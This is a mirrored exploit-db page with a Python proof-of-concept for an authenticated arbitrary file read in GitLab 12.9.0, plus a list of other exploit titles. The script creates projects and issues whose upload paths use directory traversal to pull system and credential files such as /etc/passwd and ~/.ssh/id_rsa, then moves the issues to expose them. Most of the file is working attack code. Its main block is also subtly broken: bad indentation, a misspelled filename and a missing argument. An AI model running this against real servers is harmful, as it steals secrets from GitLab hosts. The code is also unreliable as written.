bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ruby/webapps/49076.py
Offensive Security 21fa83f241 DB: 2020-11-20 
12 changes to exploits/shellcodes

Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)

Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
Joomla! Component com_memorix - SQL Injection
Joomla! Component com_informations - SQL Injection
Joomla! Component com_memorix - SQL Injection
Joomla! Component com_informations - SQL Injection
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
xuucms 3 - 'keywords' SQL Injection
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
TestBox CFML Test Framework 4.1.0 - Directory Traversal
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
M/Monit 3.7.4 - Privilege Escalation
M/Monit 3.7.4 - Password Disclosure
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
2020-11-20 05:02:04 +00:00

68 lines
No EOL
2.3 KiB
Python
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
# Google Dork: -
# Date: 11/15/2020
# Exploit Author: Jasper Rasenberg
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Kali Linux 2020.3
#You can create as many personal access tokens as you like from your GitLab profile.
# Sign in to GitLab.
# In the upper-right corner, click your avatar and select Settings.
# On the User Settings menu, select Access Tokens.
# Choose a name and optional expiry date for the token.
# Choose the desired scopes.
# Click the Create personal access token button.
# Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one.
# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html
# pip3 install gitlab
# pip3 install requests
# Use a client cert to verify SSL or set to False
import os
import requests
import json
from time import sleep
from gitlab import *
session = requests.Session()
session.verify = f'{os.getcwd()}/<cert.pem>' # or set session.verify = False
host = ''
def exploit(projectName, issueTitle, files, token):
    gl = Gitlab(host, private_token=token, session=session)
    gl.auth()
    p1 = gl.projects.create({'name': f"{projectName}-1"})
    p2 = gl.projects.create({'name': f"{projectName}-2"})
    for i, f in enumerate(files):
        stripped_f = f.rstrip('\n')
        issue = p1.issues.create({ \
                'title': f"{issueTitle}-{i}",
                'description': \
                "![a](/uploads/11111111111111111111111111111111/"\
                f"../../../../../../../../../../../../../..{stripped_f})"})
        print(issue.description)
        sleep(3)
        try:
            issue.move(p2.id)
        except Exception as e:
            pass
        sleep(3)
if __name__ == "__main__":
write_files = ['/etc/passwd', '~/.ssh/id_rsa']
with open('senstive_files', 'w') as sens:
for file in write_files:
sens.write(file)
    files = list(open('sensitive_files', 'r'))
    exploit('project-1', 'issue-1', files)
Reference in a new issue View git blame Copy permalink